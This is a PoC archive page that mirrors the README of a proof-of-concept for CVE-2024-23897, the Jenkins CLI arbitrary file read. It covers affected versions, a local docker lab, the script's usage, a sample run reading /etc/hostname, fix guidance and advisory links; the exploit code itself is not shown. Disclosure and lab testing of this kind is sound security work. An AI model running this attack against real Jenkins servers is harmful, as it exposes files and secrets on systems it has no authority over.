Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-23897 PoC — Jenkins 安全漏洞

Source
https://github.com/AbraXa5/Jenkins-CVE-2024-23897
Associated Vulnerability
Title:Jenkins 安全漏洞 (CVE-2024-23897)
Description:Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
Description
PoC for CVE-2024-23897
Readme
# Jenkins CVE-2024-23897 PoC

A proof-of-concept (PoC) for CVE-2024-23897, an arbitrary file read vulnerability in Jenkins' built-in command line interface (CLI). It allows unauthenticated attackers with Overall/Read permission to read arbitrary files on the Jenkins controller file system.

**Affected Versions**

- Jenkins versions <= 2.441
- Jenkins LTS versions <= 2.426.2

## Set up a vulnerable instance

Spin up a local vulnerable instance using docker compose:

```bash
cd docker
docker compose up -d
```

The instance will be available at `http://localhost:1234`

## Exploitation

```bash
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)
```

**Example**

```bash
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed
```

The script may have issues reading larger files due to concurrency and connection timeouts. For more technical details and a walkthrough of the vulnerability take at a look at my [blog post on the topic](https://abraxas.pages.dev/blog/cve-2024-23897/).

## Fix

- Upgrade to Jenkins 2.442 or LTS 2.426.3
- Apply temporary workarounds as described in the [Jenkins security advisory](https://www.jenkins.io/security/advisory/2024-01-24/).

## Related Links

- [Sonar Source | Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins](https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/)
- [Jenkins Security Advisory - 2024-01-24](https://www.jenkins.io/security/advisory/2024-01-24/#binary-files-note)
- [Qualys ThreatPROTECT | Jenkins Core Remote Code Execution Vulnerability (CVE-2024-23897)](https://threatprotect.qualys.com/2024/01/29/jenkins-core-remote-code-execution-vulnerability-cve-2024-23897/)
- [CVE-2024-23897: Assessing the Impact of the Jenkins Arbitrary File Leak Vulnerability – Horizon3.ai](https://www.horizon3.ai/cve-2024-23897-assessing-the-impact-of-the-jenkins-arbitrary-file-leak-vulnerability/)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →